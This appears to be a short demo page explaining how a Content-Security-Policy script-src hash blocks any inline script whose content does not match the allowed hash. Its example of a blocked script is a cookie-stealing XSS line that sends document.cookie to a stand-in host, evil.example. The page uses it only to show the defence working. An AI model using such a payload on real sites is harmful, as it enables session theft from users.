← back to examples

script-src hash

CSP is active on both pages. The script only runs if its content hashes to the value in the policy — any change, even a single character, produces a different hash and gets blocked. The policy allows markScriptRan(); (hash: sha256-wuuSTgG2ZH0LpHQwYQdFRdv6NSjNy54JsQIg1OdTzEk=).

Response header (same on both pages)
Content-Security-Policy: script-src 'self' 'sha256-wuuSTgG2ZH0LpHQwYQdFRdv6NSjNy54JsQIg1OdTzEk='
Inline script in page source
<script>fetch('https://evil.example/steal?c=' + document.cookie)</script>
// Header allows hash: sha256-wuuSTgG2ZH0LpHQwYQdFRdv6NSjNy54JsQIg1OdTzEk=
// Script hash: sha256-pcm1nyWhBSf3l9G86JIr9EsTSfyRejJgpap8Xl1i8Vo= ← does not match
Result
( ._.)

Check the browser console to see the CSP violation error.